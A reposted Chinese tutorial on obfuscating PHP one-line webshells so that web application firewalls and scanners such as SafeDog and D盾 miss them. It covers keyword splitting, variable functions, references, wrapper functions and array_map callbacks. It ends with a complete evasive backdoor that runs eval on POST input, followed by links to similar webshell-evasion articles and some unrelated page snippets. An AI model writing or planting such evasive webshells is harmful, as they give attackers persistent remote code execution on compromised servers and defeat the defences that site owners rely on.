原文转载于:http://www.legendsec.org/1701.html

觉得写得还算蛮科普的。

00x1.关键字拆分。
         比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
         总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

00x2.可变变量、引用、可变函数。

可变变量  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
        测试结果:
        总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

引用  比如$a=$_POST[‘x’];$b=&$a;@eval($b);
        测试结果: 

总结:这种方法与上一种方法类似。

可变函数  比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
        测试结果: 
        总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~

00x3.添加其他代码。

添加其他代码  比如  if(empty($a))

{
                                              $a=$_POST[‘x’];
                                       }

@eval($a);
        测试结果: 
        总结:这种方法比较适合脑洞比较大的小伙伴们~

00x4.函数替换。

使用其他函数,比如eval可以使用assert替换。

总结:这种方法适合eval函数被禁用时使用哦~

00x5.封装到新的函数中。

新定义一个函数,使其封装到新函数中。

function test($a){   //定义一个名为test的函数,并使用$a接受参数

eval($a);

}

test($_POST[‘x’]);

测试结果: 
       总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!

00x6.函数回调。

使用其他函数进行调用,并执行。

如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
       测试结果: 
       总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~

00x7.利用各种方法的特性写出过WAF的一句话。
       <?php
function test($a){      //利用所学的封装函数
if (empty($a)){       //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”;      //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>

测试结果: 

THE END


PHP一句话过狗、卫士、D盾等免杀思路!的更多相关文章

  1. 免杀PHP一句话一枚

    免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23&q ...

  2. PHP一句话简单免杀

    PHP一句话简单免杀 原型 几种已经开源的免杀思路 拆解合并 <?php $ch = explode(".","hello.ev.world.a.l"); ...

  3. 绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

    这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Win ...

  4. PHP一句话木马Webshell变形免杀总结

    0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不 ...

  5. 免杀ASP一句话

    <% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function ...

  6. 关于php一句话免杀的分析<转载>

    一开始想这样:   <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什 ...

  7. php中转菜刀脚本过狗免杀

    <?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) ...

  8. 一句话木马:PHP篇

    珍藏版: 一个简单的过D盾的免杀php <?php $ab = $_REQUEST['d']; $a['t'] = "";//主要带对象 D盾就不管后面的了... eval( ...

  9. Webshell免杀研究

    前言 不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗.D盾.护卫神.云锁等安全软 ...

随机推荐

  1. div文字超出

    效果一:div文字超出处理 <div style="width:200px; white-space:nowrap;overflow:hidden;text-overflow:elli ...

  2. 使用Topshelf 开发windows服务

    在业务系统中,我们为了调度一些自动执行的任务或从队列中消费一些消息,所以基本上都会涉及到后台服务的开发.如果用windows service开发,非常不爽的一件事就是:调试相对麻烦,而且你还需要了解 ...

  3. wampserver 绑定域名 外部可以正常访问

    wampserver使用的apache  绑定都一样 绑定的域名xuechao2010.gicp.net  端口是8989 系统是win7 64位 1.绑定域名 端口  在apache上 D:\wam ...

  4. servlet request getHeader(“x-forwarded-for”) 获取真实IP

    request方法客户端IP: request.getRemoteAddr() 输出:192.168.0.106 客户端主机名:request.getRemoteHost()输出:abc reques ...

  5. PHP单一入口apache配置和去除index.php

    index : index在互联网上表示网站的默认主页. 一般为 index.html index.htm index.asp index.php: 另外的默认主页也多用default.html;de ...

  6. WebService 之 WSDL文件 讲解

    原文地址:http://blog.csdn.net/tropica/archive/2008/11/02/3203892.aspx 恩,我想说的是,是不是经常有人在开发的时候,特别是和第三方有接口的时 ...

  7. jupyter notebook + pyspark 环境搭建

    安装并启动jupyter 安装 Anaconda 后, 再安装 jupyter pip install jupyter 设置环境 ipython --ipython-dir= # override t ...

  8. golang的json操作

    package main import ( "encoding/json" "fmt" "os" ) type ConfigStruct s ...

  9. 关于Sublime text 的PHP编译环境配置的问题

    前一段时间终于装上了传说中的代码编辑神器====>Sublime Text ,一打开便爱不释手,于是在网上找PHP的配置方案和插件,所有的一切都搞定了,可就是编译的时候没有显示,也没有提示,熬了 ...

  10. php打印出来金字塔

    /*                   空格数($k):   第几($i)层    所以:$k+$i=$m  $k=$m-$i *            *                 3--- ...